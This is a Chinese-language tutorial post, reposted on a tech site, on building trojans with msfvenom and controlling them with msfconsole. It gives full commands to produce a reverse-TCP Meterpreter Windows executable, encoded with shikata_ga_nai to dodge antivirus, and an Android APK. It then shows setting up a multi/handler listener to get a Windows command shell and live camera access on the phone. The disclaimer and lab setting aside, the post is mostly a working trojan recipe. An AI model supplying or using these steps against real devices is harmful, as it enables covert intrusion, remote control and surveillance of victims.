msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

编程知识 更新时间:2023-04-17 18:17:17

文章目录

  • 一、使用环境
  • 二、msfvenom编写Trojan木马
    • Ⅰ、电脑端.exe格式
    • Ⅱ、移动端.apk格式
  • 三、msfconsole控制感染对象
    • Ⅰ、电脑端示例:`shell`获取Windows的CMD
    • Ⅱ、移动端示例:`webcam_stream`获取Android摄像头实时画面

免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规

一、使用环境

  1. VMware V15.5.0
  2. Kali-Linux-2020.2
  3. msfconsole
  4. msfvenom
  5. Windows Server 2008 R2 Enterprise
  6. Android10 & EMUI10.1

二、msfvenom编写Trojan木马

在Kali的终端使用msfvenom命令制作后门木马程序

Ⅰ、电脑端.exe格式

在终端输入以下指令以生成木马

msfvenom -p windows/meterpreter_reverse_tcp LHOST={Kali系统IP} LPORT={监听端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5
可选参数描述
-p使用平台
-e编码方式
-f文件格式
-o存储为
-i编译次数
-x捆绑软件

平台选择windows/meterpreter_reverse_tcp

Ⅱ、移动端.apk格式

msfvenom -p android/meterpreter_reverse_tcp R > /home/用户名/桌面/{文件名}.apk

平台选择android/meterpreter_reverse_tcp
保存方式与电脑端不同

三、msfconsole控制感染对象

两平台主要操作相同,区别在于参数

当在Windows中打开制作好的木马后,后门便会自动开放,程序后台静默运行
在Android打开后也是同理。安全软件会直接识别并报毒

在Kali终端使用msfconsole控制感染对象
加载exploit/multi/handler模块

设置载荷,Windows和Android的载荷与制作程序时输入的-p参数一致
windows/meterpreter_reverse_tcp
android/meterpreter_reverse_tcp

最后再设置LHOST和LPORT与程序的参数一致
指向Kali系统IP

配置完毕,run运行监听

Ⅰ、电脑端示例:shell获取Windows的CMD

Ⅱ、移动端示例:webcam_stream获取Android摄像头实时画面

提高警惕,切勿安装不明来源的程序软件

欢迎在评论区留言
感谢浏览

更多推荐

msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

本文发布于:2023-04-14 02:42:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/4d0d3f470621d170d1761a866debd7b4.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:木马   手机   amp   msfvenom   msfconsole

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

  • 74359文章数
  • 14阅读数
  • 0评论数